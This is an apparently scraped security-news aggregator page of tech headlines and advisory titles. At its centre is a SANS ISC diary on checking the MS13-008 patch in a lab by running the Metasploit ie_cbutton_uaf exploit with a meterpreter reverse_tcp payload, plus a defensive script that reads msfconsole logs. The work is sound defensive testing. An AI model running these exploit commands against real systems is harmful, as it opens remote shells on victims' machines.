Hackin9
Cuba's Internet speeds increased on Tuesday, and the country appears to be routing more traffic through a previously dormant undersea fiber-optic cable, according to Internet monitoring company Renesys.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Google's fourth-quarter revenue was up 36 percent from the previous year, thanks to continued growth in its advertising business.
 
Making the most of a sluggish world economy, IBM managed to increase its net income by 5 percent in 2012, even though revenue shrank by 2 percent.
 
Advanced Micro Devices' financial struggles continued in the fourth quarter, with revenue sinking 32 percent due to slow chip sales and charges tied to restructuring and inventory adjustments.
 
 
U.S. lawmakers on Tuesday urged government officials to clamp down on bad IT contracts and limit duplication across projects, with an estimated one quarter of federal spending on IT wasted every year.
 
Tablets and smartphones will give a much-needed boost this year to the worldwide microprocessor market, which is undergoing a fundamental change with a shift to low-power processors used in energy-efficient devices, research firm IC Insights said.
 
For every person using 4G LTE now, there will be at least one more subscriber by the end of this year, IHS iSuppli says.
 
Oracle MySQL CVE-2012-2749 Denial Of Service Vulnerability
 
Deep Space Industries is looking to launch spacecraft to mine asteroids and one day act as an outer space gas station and an oasis for human colonies in space.
 
The number of patients monitored at home by healthcare providers is expected to grow from 308,000 today to 1.8 million in 2017.
 
As it has in the past, SAP spilled the beans a bit early on its fourth-quarter and year-end performance with the release of preliminary results last week. On Wednesday, the vendor is about to fill in the details.
 
Oracle MySQL Server CVE-2013-0384 Remote Security Vulnerability
 
Users who signed into third-party Web or mobile applications using their Twitter accounts might have given those applications access to their Twitter private "direct" messages without knowing it, according to Cesar Cerrudo, CTO of IOActive.
 
Microsoft will ship the Surface Windows 8 Pro tablet with an Intel Core i5 processor on Feb. 9, with prices starting at US$899.
 
Oracle MySQL Server CVE-2012-0574 Remote Security Vulnerability
 
Oracle MySQL Server CVE-2012-0578 Remote Security Vulnerability
 
Oracle MySQL Server CVE-2012-5060 Remote Security Vulnerability
 
Oracle MySQL Server CVE-2013-0371 Remote Security Vulnerability
 
A NASA spacecraft is sending back evidence that a deep crater on Mars once held a groundwater-fed lake.
 
Wordpress Valums Uploader - File Upload Vulnerability
 

Introduction

Earlier last week a reader wrote in and asked us if the patch for MS13-008 [1] [2] had worked. A comprehensive patch validation could take a significant amount of time; however, there are a couple of things you can do to get a quick sanity check.

I use Metasploit [3] when doing patch sanity checks. Also, with a virtual machine you can take snapshots at various stages of patching. In this case my system is configured with VMware Fusion Version 5.0.2 (900491) [4] and Metasploit. Installation instructions for Metasploit exist all over the Internet, so we will not reproduce them here. A great install guide for OS X Mountain Lion can be found here [5]; I avoid the Java component, however.

My setup includes two lab copies of Windows XP (I have been meaning to update to Windows 7), one that is not patched and one that is fully patched.

Using Google to Find Things

To run my quick sanity check, I will first locate the exploit within Metasploit's exploit database. There are a couple of ways to achieve this. I usually start with a quick Google check to locate the Metasploit page on MS13-008. Putting:

site:metasploit.com ms13-008

in my search bar yields what I'm looking for at the top of the results [6].



Note: You can take a look at this great presentation on Google-fu [7], and there are many books on the subject.



Setting the Trap

The second step is to get Metasploit running on the attacker machine and set up the exploit for MS13-008. We do this by navigating to the module page, which shows us where the exploit lives in the exploit database [6]. The documentation tells us that what we are looking for is located at:

exploit/windows/browser/ie_cbutton_uaf

So we run the command:

use exploit/windows/browser/ie_cbutton_uaf

Looking at the exploit documentation, we are going to stick with the basic usage and enter:

set PAYLOAD windows/meterpreter/reverse_tcp

Then we enter the next command and set it to our host-only IP:

set LHOST <your host-only IP>

And then enter:

exploit

From here you should see output like the image below:





My setup is simple. I have two virtual machines ready to go, one fully patched and one that is unpatched. First we will look for a successful exploit on the unpatched machine to validate the Metasploit payload itself. Second, we will run it against the fully patched system and ensure that it fails.

Note: Take snapshots of your virtual machines. It is a royal pain when you forget to do this!



Springing the Trap

The first step on the target machine is to start Process Hacker [8] so we can observe the exploit process start. This also allows us to watch some behavior as it occurs (because we like that stuff, right?). Then we copy and paste the exploit's web location into our target machine's browser and watch the magic!



At this point we know the unpatched version of the virtual machine is exploited and MS13-008 is a successful vector, as Process Hacker is showing the injection.







Checking the Patch

Now for the quick sanity check and patch validation. Run the same exploit against your fully patched target virtual machine, and the exploit should fail. In my case, my local VM anti-virus caught the exploit, and the exploit also failed after the anti-virus was disabled.

Copy and paste your exploit location into the patch validation target and watch the Metasploit output.

In this case we are going to monitor a bit more deeply, as we don't want to just trust what we see in Process Hacker. So we fire up RegShot [8] and take a first snapshot, setting c: as the start directory so that the file system is covered as well as the registry.

Note: This can take some time.



After this is complete we then copy and paste our exploit location into the target browser and check our results. Sure enough, Metasploit sends the malicious exploit payload but does not appear to get a connection back from a payload process:



We then do a quick check with Process Hacker and look at the running processes.



And finally we take a second RegShot snapshot and compare it against the first to look for any changes to the operating system.



After reviewing the RegShot comparison we can say with some confidence that the patched system survived the attack.

We then re-enable our patched and updated anti-virus suite and run the attack again to check our AV signatures. It also picked up the attack.
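As an added example (not from the diary), here is a small Python check that applies the pass/fail logic of the procedure above to msfconsole output: the unpatched control VM must yield a Meterpreter session, proving the module works, while the patched VM must receive the payload but never call back. The log lines and IP addresses are constructed, loosely modelled on what a Metasploit browser exploit module prints, and are not captured output.

```python
import re

# Constructed msfconsole output for two lab targets. These lines are modelled
# loosely on what a Metasploit browser exploit module prints; they are not
# real captured output, and the IP addresses are made up.
SAMPLE_LOG = """\
[*] 192.168.56.101 ie_cbutton_uaf - Requesting: /abc123
[*] 192.168.56.101 ie_cbutton_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.56.101 ie_cbutton_uaf - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1043)
[*] 192.168.56.102 ie_cbutton_uaf - Requesting: /abc123
[*] 192.168.56.102 ie_cbutton_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.56.102 ie_cbutton_uaf - Sending HTML...
"""

# A browser visited the exploit URL and the module sent it the payload page.
SENT_RE = re.compile(r"^\[\*\] (?P<ip>\d+\.\d+\.\d+\.\d+) \S+ - Sending HTML")
# The payload ran and called back: this must NOT happen on a patched box.
SESSION_RE = re.compile(r"session \d+ opened \(\S+ -> (?P<ip>\d+\.\d+\.\d+\.\d+):\d+\)")


def classify_targets(log_text):
    """Return {ip: verdict}: a target that was sent the payload but never
    opened a session SURVIVED; one that opened a session was EXPLOITED."""
    sent, opened = set(), set()
    for line in log_text.splitlines():
        if m := SENT_RE.match(line):
            sent.add(m.group("ip"))
        elif m := SESSION_RE.search(line):
            opened.add(m.group("ip"))
    return {ip: ("EXPLOITED" if ip in opened else "SURVIVED") for ip in sent | opened}


def patch_check(log_text, unpatched_ip, patched_ip):
    """Pass only when the control box proves the exploit works AND the patched
    box received the payload without calling back. A target that never
    requested the page is NOT REACHED, which makes the check inconclusive."""
    verdicts = classify_targets(log_text)
    control = verdicts.get(unpatched_ip, "NOT REACHED")
    candidate = verdicts.get(patched_ip, "NOT REACHED")
    return control == "EXPLOITED" and candidate == "SURVIVED", control, candidate


if __name__ == "__main__":
    ok, control, candidate = patch_check(SAMPLE_LOG, "192.168.56.101", "192.168.56.102")
    print(f"control VM: {control}, patched VM: {candidate}, check {'PASSED' if ok else 'FAILED'}")
```

Feed it a real msfconsole log (for example one saved with spool) and the same two verdicts tell you whether the run was a genuine patch validation or just a module that never fired.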





Conclusion

In the fast-paced, often interrupt-driven lives we lead, this method can act as a fast validation. Often, when a reader writes in and asks if a patch took, this is the process I will use if I am in a hurry (which is often the case). This of course assumes that an exploit for the patched vulnerability has been added to the Metasploit database. There are other methods, and remember this is just a quick check.





[1] http://isc.sans.edu/diary/January+2013+Microsoft+Out+of+Cycle+Patch/14941

[2] http://technet.microsoft.com/en-us/security/bulletin/ms13-008

[3] http://www.metasploit.com/

[4] http://www.vmware.com/products/fusion/overview.html

[5] http://www.darkoperator.com/installing-metasploit-framewor/

[6] http://www.metasploit.com/modules/exploit/windows/browser/ie_cbutton_uaf

[7] http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf

[8] http://sourceforge.net/projects/regshot/





Richard Porter

--- ISC Handler on Duty
 
Re: [SE-2012-01] Java 7 Update 11 confirmed to be vulnerable
 
PHP 'openssl_encrypt()' Function Information Disclosure Vulnerability
 
CVE-2013-1402 - DigiLIBE Management Console - Execution After Redirect (EAR) Vulnerability
 
SEC Consult SA-20130122-1 :: F5 BIG-IP SQL injection vulnerability
 
SEC Consult SA-20130122-0 :: F5 BIG-IP XML External Entity Injection vulnerability
 
Wordpress Developer Formatter CSRF Vulnerability
 
Looking for security contacts
 
[SECURITY] [DSA 2611-1] movabletype-opensource security update
 
Attorney and risk consultant Doug DePeppe continues the discussion on what the U.S. cybersecurity doctrine should look like.
 
Responding to a growing user base of online service providers, VoltDB has outfitted its namesake in-memory database management system with additional tools to communicate with other technologies usually found in a Web applications stack.
 
The parent company of Alltel, a mobile telephone network serving rural customers in six states, has agreed to sell the business to AT&T for about $780 million, Atlantic Tele-Network announced Tuesday.
 
A note from security luminary Dan Geer to those middling firms that are not yet resource-rich enough for how information-rich they already are.
 
Hulu did it for video, and Spotify did it for music. Now Roozz is hoping to do the same thing for software: bring it to the cloud, in a hosted, pay-as-you-need-it format. Roozz End User (free) is slickly designed and mostly easy to use, but, for now, at least, it's a bit hampered by a limited title selection and a few technical glitches.
 
A Canadian student who ran web vulnerability detection tools on his college's administration systems as he attempted to check whether a security vulnerability he had reported had been fixed has been expelled for his efforts.


 
[SECURITY] [DSA 2610-1] ganglia security update
 
Western Digital has acquired data protection company Arkeia Software as it looks to address growing storage demands among small and medium-size companies.
 
Survey also shows greater business alignment a goal, but more so than usual
 
Mozilla has launched Keon and Peak, two smartphones based on the web-centric Firefox OS platform.
 
Verizon Communications posted a net loss of $1.9 billion during the fourth quarter of 2012, but the losses were due to a series of one-time expenses announced earlier.
 
Those who want to try the much-hyped Hadoop but haven't got a cluster or two to spare can now test the data processing platform on their desktops, thanks to a new release from Hadoop distributor Hortonworks.
 
Micron today announced its highest-endurance SSD for servers, the P400m, boasting the ability to fill a 400GB drive 10 times a day for five years.
 
It appears that a dispute between browser makers and the Chinese government over train tickets may have led to the Github project hosting platform getting blocked in China.


 
Security company Trend Micro has released a report on what it has dubbed Fakem RATs - trojans which attempt to conceal their communications by mimicking common instant messaging protocols.


 
IBM Tivoli Federated Identity Manager 'OpenID' Attribute Validation Security Bypass Vulnerability
 
Twitter's service had problems on Monday for over six hours with some users complaining the service was slow, while others could not access the service.
 
NEC Casio's forthcoming Medias W Android smartphone has two 4.3-inch touch screens arranged back-to-back on a hinge.
 
IBM Intelligent Operations Center HTML Injection Vulnerability
 
Beset by some very public vulnerabilities in Java, and apparently unable to properly patch those bugs, Oracle must dramatically step up its security game, experts said.
 
As the threat of federal budget cuts hovers, IT managers are turning to agile development to speed up projects and quickly show their value.
 
Cisco VPN Client for Windows CVE-2012-5429 Local Denial of Service Vulnerability
 

What makes a good information security professional?
Help Net Security
"The infosec market has changed dramatically over the past decade. Changes in regulations, such as SOX, PCI DSS and Data Protection, and increased threats from online criminals have raised the profile of information security. At the moment, infosec in ...

 

Posted by InfoSec News on Jan 21

Forwarded from: Hafez Kamal <aphesz (at) hackinthebox.org>

Happy belated 2013 everyone! This is a gentle reminder that the
Call for Papers for #HITB2013AMS (the fourth annual HITBSecConf in
Amsterdam) closes on the 8th of February. We're looking for talks that
are highly technical, but most importantly, material which is new and
cutting edge. In short, please don't submit if you're merely going to
rehash your talks from...
 

Posted by InfoSec News on Jan 21

http://www.informationweek.com/security/attacks/operation-red-october-attackers-wielded/240146621

By Mathew J. Schwartz
InformationWeek
January 18, 2013

The Red October malware network is one of the most advanced online espionage
operations that's ever been discovered. That's the conclusion of Moscow-based
security firm Kaspersky Lab, which first discovered Operation Red
October--"Rocra" for short--in October 2012....
 

Posted by InfoSec News on Jan 21

http://arstechnica.com/security/2013/01/canadian-student-expelled-for-playing-security-white-hat/

By Sean Gallagher
Ars Technica
Jan 21 2013

A 20-year-old Canadian computer science student has become, depending on your
point of view, a martyr for computer security or a cautionary tale for students
and others who take an interest in exposing security flaws in software
products. While Ahmed Al-Khabaz said he felt he had a "moral...
 

Posted by InfoSec News on Jan 21

http://www.theregister.co.uk/2013/01/22/pwn2own_web_plugin_prize/

By Iain Thomson in San Francisco
The Register
22nd January 2013

The organizers of the Pwn2Own hacking competition held at the annual CanSecWest
security conference have upped the prize pool to $US560,000 and will now be
offering prizes for hacking web plug-ins from Adobe and Oracle.

The contest, which dropped mobile phone hacking last year, has added web
plug-in hacking to...
 

Posted by InfoSec News on Jan 21

http://www.nationaldefensemagazine.org/blog/Lists/Posts/Post.aspx?ID=1026

By Stew Magnuson
National Defense
1/17/2013

In a time of hiring freezes and great budget uncertainty, the Air Force
plans to hire more than 1,000 personnel at its wing devoted to
cyber-operations.

The 24th Air Force, located at Lackland Air Force Base, in San Antonio,
Texas, will “hopefully” add “well over” 1,000 mostly civilian new hires
over the span of two...
 
Vino CVE-2012-4429 Information Disclosure Vulnerability
 